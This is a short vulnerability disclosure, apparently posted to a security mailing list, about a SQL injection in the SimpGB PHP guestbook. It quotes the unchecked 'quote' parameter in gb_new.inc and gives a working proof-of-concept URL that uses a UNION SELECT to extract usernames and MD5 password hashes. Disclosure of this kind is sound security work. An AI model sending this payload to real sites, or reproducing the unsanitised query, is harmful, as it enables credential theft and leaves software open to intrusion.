simpgbSQL.txt

`Hi,  
  
The PHP guestbook SimpGB [1], written by Boesch IT-Consulting [2] can be   
exploited to gain  
userdata. The quote variable isn't checked carefully in   
simpgb/include/gb_new.inc called  
by guestbook.php.  
I wrote a proof of concept which shows a md5 hash and the username, read   
from the database.  
  
simpgb/include/gb_new.inc:  
  
50: if(isset($quote) && ($quote))  
51: {  
52: $sql = "select * from ".$tableprefix."_data where entrynr=$quote";  
53: if(!$result = mysql_query($sql, $db))  
54: die("Unable to connect to database.".mysql_error());  
  
PoC:  
  
http://[whereever the guestbook is]/simpgb/guestbook.php?lang=de&mode=new  
&quote=-1%20UNION%20SELECT%200,0,username,0,password,0,0,0,0,0,0  
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20simpgb_users%20WHERE%201  
  
The developer has been informed.  
  
[1] http://www.boesch-it.de/sw/php-scripts/simpgb/english/download.php  
[2] http://www.boesch-it.de  
  
Greets to neonomicus who helped me getting the database structure of SimpGB.  
  
visus  
`